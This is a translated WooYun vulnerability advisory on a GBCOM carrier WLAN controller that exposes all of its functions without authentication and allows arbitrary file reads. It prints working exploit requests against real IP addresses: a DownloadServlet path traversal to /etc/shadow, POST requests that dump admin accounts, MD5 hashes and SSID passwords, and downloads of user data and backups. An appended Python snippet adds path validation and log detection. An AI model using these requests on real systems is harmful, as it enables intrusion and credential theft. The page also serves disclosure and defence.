WooYun >> Vulnerability information

Vulnerability summary

Defect ID: wooyun-2015-0121010

Title: A Shanghai GBCOM WLAN product allows unauthenticated access to all functions and arbitrary file traversal (used by all three major carriers / 97 cases attached)

Vendor: Shanghai GBCOM Communication Technology Co., Ltd. (上海寰创通信科技股份有限公司)

Author: YY-2012

Submitted: 2015-06-17 12:14

Fixed: 2015-09-20 09:34

Published: 2015-09-20 09:34

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-06-17: Details reported to the vendor; awaiting vendor response
2015-06-22: Vendor confirmed; details visible to the vendor only
2015-06-25: Details opened to third-party security partners
2015-08-16: Details opened to core white hats and domain experts
2015-08-26: Details opened to regular white hats
2015-09-05: Details opened to intern white hats
2015-09-20: Details opened to the public

Brief description:

A carrier WLAN product. Are all three major carriers affected? (Administrator account names and passwords, among other data, can be retrieved directly.)

Detailed description:

Shanghai GBCOM Communication Technology Co., Ltd., carrier WLAN products:

http://www.gbcom.com.cn/index.aspx?cat_code=yysWLANcp


Without logging in, every function of the device can be accessed without authorisation, and arbitrary system files can be read by path traversal.
The source of the device's login page shows that Shanghai GBCOM Communication Technology Co., Ltd. is the manufacturer of this product.

Proof of vulnerability:

Unauthenticated arbitrary system file traversal:

http://url/DownloadServlet?fileName=../../etc/shadow




Unauthenticated retrieval of all system information (a selection of functions is shown):
Retrieving administrator account names and passwords

POST /acUser.shtml?method=getList HTTP/1.1
Host: 58.16.195.122
Content-Length: 17
Origin: http://58.16.195.122
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://58.16.195.122/loginAction.shtml
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=
start=0&limit=128


The passwords are returned as plain (unsalted) MD5 hashes.


Retrieving connected AP information (the limit parameter sets how many records are returned)

POST /accessApInfo.shtml?method=getAccessAps HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://119.4.167.76/loginAction.shtml
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 119.4.167.76
Content-Length: 31
Pragma: no-cache
Cookie: JSESSIONID=
start=0&limit=120&type=0&value=




Retrieving the WLAN SSID information

POST /wlanService.shtml?method=getList HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://119.4.167.76/loginAction.shtml
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 119.4.167.76
Content-Length: 16
Pragma: no-cache
Cookie: JSESSIONID=
start=0&limit=20


The request above returns the SSID names; with those names, the following requests retrieve the corresponding security settings and passwords:

/wlanDelService.shtml?method=getSecurityBySsid&acSsid=China%20Unicom
/wlanDelService.shtml?method=getSecurityBySsid&acSsid=ChinaNet
/wlanDelService.shtml?method=getSecurityBySsid&acSsid=ChinaUnicom
/wlanDelService.shtml?method=getSecurityBySsid&acSsid=Chinaunicom
/wlanDelService.shtml?method=getSecurityBySsid&acSsid=management


acSsid is the name of the WLAN.


Retrieving AP device management information

POST /apConfig.shtml?method=getApCfgList HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://119.4.167.76/loginAction.shtml
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 119.4.167.76
Content-Length: 30
Pragma: no-cache
Cookie: JSESSIONID=
start=0&limit=100&type=0&value=




Downloading the access-user information

http://url/DownloadServlet?fileName=accessuserinfo.xls




Downloading the system backup file

http://url/DownloadServlet?fileName=ac.dat
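As an added defensive illustration (not code from the report or from the vendor's product), the Python below shows a canonicalising check that would refuse the DownloadServlet traversal shown above while still serving the two legitimate export files, plus an access-log scan that flags traversal attempts and management-endpoint requests from outside an admin network. The download root, the admin network and the sample log lines are assumed values constructed for the example.

```python
import os
import re
from ipaddress import ip_address, ip_network
from urllib.parse import unquote

# Assumed values: the product's real download directory and admin network are not on the page.
DOWNLOAD_ROOT = "/opt/ac/export"
ADMIN_NET = ip_network("10.0.0.0/8")
# File names the download endpoint legitimately serves (both appear in the report).
ALLOWED_FILES = {"accessuserinfo.xls", "ac.dat"}
# Endpoints the report shows answering with an empty JSESSIONID.
MGMT_PATHS = {"/acUser.shtml", "/accessApInfo.shtml", "/wlanService.shtml", "/wlanDelService.shtml", "/apConfig.shtml", "/DownloadServlet"}
TRAVERSAL = re.compile(r"\.\.[/\\]")


def resolve_download(file_name: str, root: str = DOWNLOAD_ROOT) -> "str | None":
    """Canonicalise a fileName value; return the path to serve or None to refuse."""
    decoded = unquote(unquote(file_name))  # strip single and double percent-encoding
    if "\x00" in decoded or "\\" in decoded:
        return None
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, decoded))
    # The resolved file must sit directly inside the root and be on the allowlist;
    # '../../etc/shadow' resolves to /etc/shadow and fails the first check.
    if os.path.dirname(candidate) != root_real:
        return None
    if os.path.basename(candidate) not in ALLOWED_FILES:
        return None
    return candidate


def flag_requests(log_lines: list) -> list:
    """Scan Common Log Format lines; return (line number, reason) for suspicious hits."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.match(r'(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP', line)
        if not m:
            continue
        src, target = m.group(1), m.group(2)
        path, _, query = target.partition("?")
        if path == "/DownloadServlet" and TRAVERSAL.search(unquote(unquote(query))):
            hits.append((n, "path traversal in DownloadServlet fileName"))
        elif path in MGMT_PATHS and ip_address(src) not in ADMIN_NET:
            hits.append((n, "management endpoint reached from outside the admin network"))
    return hits


# Constructed sample log lines (not taken from the report).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Jun/2015:12:14:00 +0800] "GET /DownloadServlet?fileName=../../etc/shadow HTTP/1.1" 200 1024',
    '203.0.113.5 - - [17/Jun/2015:12:14:01 +0800] "POST /acUser.shtml?method=getList HTTP/1.1" 200 5120',
    '10.1.2.3 - - [17/Jun/2015:12:15:00 +0800] "GET /DownloadServlet?fileName=ac.dat HTTP/1.1" 200 88000',
]
```

The canonicalisation check is only half of the fix for this product: every method on the management endpoints also needs a valid session check before any data is returned.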




The remaining functions are not listed one by one.
97 affected instances (list of hosts omitted):

Remediation:

Contact the vendor.

Copyright notice: please credit the source when republishing, YY-2012 @ WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-06-22 09:32

Vendor reply:

CNVD confirmed and reproduced the described situation. CNVD has notified the software vendor by phone and email through public contact channels, and the vendor will coordinate follow-up handling with the user organisations. Scored as multiple risks, rank 20.

Latest status:

None yet